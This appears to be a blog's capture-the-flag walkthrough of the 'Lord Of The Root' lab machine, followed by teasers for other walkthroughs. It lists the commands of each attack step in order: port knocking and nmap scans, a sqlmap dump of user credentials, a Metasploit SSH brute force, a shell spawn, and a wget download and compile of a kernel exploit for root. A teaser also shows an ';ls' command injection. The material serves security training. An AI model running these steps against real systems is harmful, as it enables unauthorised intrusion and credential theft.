Lord Of The Root: 1.0.1

How about taking a look on Port Knocking?
Let’s see how we can knock ports in this CTF !!
Lab Environment
Attacker’s Machine : Linux kali 4.18.0-kali2-amd64 #1 SMP Debian 4.18.10-2kali1 (2018-10-09) x86_64 GNU/Linux
Vulnerable Machine : Lord Of The Root: 1.0.1
Now let’s scan our local network to which attacking machine and the vulnerable machine is connected. 
Syntax used: arp-scan --local
Victim machine: 192.168.59.135


Performing the enumeration of ports and services using nmap.
Syntax Used: nmap -A 192.168.59.135 -Pn 
Results: Port 22 is open and ssh service is active.


Tried connecting to ssh and got some hint to knock ports 1,2,3
Syntax Used: ssh 192.168.59.135


Now performing port scanning again as given in the hint.
Syntax Used: nmap -r -p1,2,3 -A 192.168.59.135 -Pn


Now, again performing the nmap scan to see if something happened or if we can get the new results.
Syntax Used: nmap -p- -A 192.168.59.135 -Pn 
Results: http service is active on port 80


Tried to browse the IP as http service is active.


Now usual approach again!! Browsing robots.txt


A usual habit to view source code of every page.
This time it helped me and gave me base64 encoded string.


Decoding the base64 string with terminal.
Syntax Used: echo”encoded string” | base64 -d
And again got another base64 encoded string.


Decoding another string which we got after decoding the first one.
Results: /978345210/index.php


Now browsing the url with above path.
Boom!! Got login panel(which can be entry point).
Tried few things like auth bypass etc. but nothing proved to be successful.


Stuck, But sqlmap helped me.
Attacking forms with sqlmap and extracted databases.
Syntax Used: sqlmap -u “url/index.php” --forms --dbs --batch


Extracted all the details of all the databases but only Webapp was containing something useful.
Now, it’s time to extract the tables of Webapp.
Syntax Used: sqlmap -u “url/index.php” --forms -D Webapp --tables --batch
Results: Users table was present.


Dumping all the details of Users.
Syntax Used: sqlmap -u “url/index.php” --forms -D Webapp --tables --dump-all --batch
Copying usernames obtained in users.txt file and passwords obtained in pass.txt file.
Planning to brute force the ssh login with ssh auxiliary.
Firing up msfconsole from the terminal and using ssh login auxiliary to brute force the ssh login.
Providing the necessary details needed as shown.
Sorry guys I messed up with the things.
I missed one i.e set rhosts I.P of a victim.
Finally, typing exploit will run the auxiliary with provided users and pass files.
Results: command shell opened when our brute force is successful.


Want to know active sessions.
Type sessions -i
One session is opened, having ID “1”
To access that:
Syntax Used: sessions -i 1


Spawning the shell.
Syntax Used: python -c’import pty; pty.spawn(“/bin/sh”)’
And enumerating the kernel version to escalate privileges.
Syntax Used: uname -a


Downloading the suitable exploit in temp directory of a machine using wget utility.
Syntax Used: wget Download link address.
Results: exploit is downloaded named 39166


Changing name of 39166 to paras.c.
Syntax Used: mv 39166 paras.c


Now compiling paras.c file using gcc compiler.
Syntax Used: gcc paras.c -o paras


Executing the file named paras.
Syntax Used: ./paras
Results: gained root.


Reading the Flag.txt in the root directory.








Popular posts from this blog

Calculat3 M3 | CTF Learn

Image
This walkthrough will demonstrate the simple challenge based on command injection Calculat3 M3 This is the challenge page we got after visiting the given link. I provided random input in this calculator and intercepted the request with BurpSuite I got one parameter "expression" taking the values  Tried for command injection with ";ls" Forwarding the above request finally Got the Flag
Read more

TryHackme: Blue Walkthrough

Image
Task 1: Recon After we've connected to the tryhackme network the first task is to enumerate the target. We use Nmap for scanning the target IP. Command Used : nmap -sS -Pn <target-ip> -sS : Scan using TCP SYN scan -Pn : Treats all host as online --skip host discovery Next we used a command to find the vulnerability on the target machine. Command Used : nmap --script vuln <target-ip> --script : Specify the --script option to choose your own scripts to execute by providing categories , script file names, or the name of directories full of scripts you wish to execute. vuln : These scripts check for known vulnerabilites and generally only report results if they are found. Below, we see that nmap is indicating the target may be vulnerable to ms17-010(on the left0 and we can verify this using metasploit. To start Metasploit use command "msfconsole" We start by simply doing a search for ms17-010 Here we use module 2 i.e. exploit/windows
Read more

CTF - Dina : 1.0.1 walkthrough

Image
     Lab Environment  : Attacker’s Machine :  Linux kali 4.13.0-kali1-amd64 #1 SMP Debian 4.13.10-1kali2(2017-11-08) x86_64 GNU/Linux Vulnerable Machine : Dina: 1.0.1 Scanning phase route -n (To know the gateway) i.e 172.16.60.2 arp-scan --local (to know the devices connected to the local network)   Vulnerable machine IP : 172.16.60.154           Using nmap for scanning the IP : nmap -sS -sC -sV  172.16.60.154 We got one open port i.e 80 and http service is active Since the port 80 is open and http service is active then we can open the IP in browser.   Another nmap syntax to know vulnerability if any : nmap --script vuln 172.16.60.154 Now further using dirb for scanning the directories : dirb http://172.16.60.154 Some results are obtained after using dirb .  Opened the http://172.16.60.154/robots.txt and found something interesti
Read more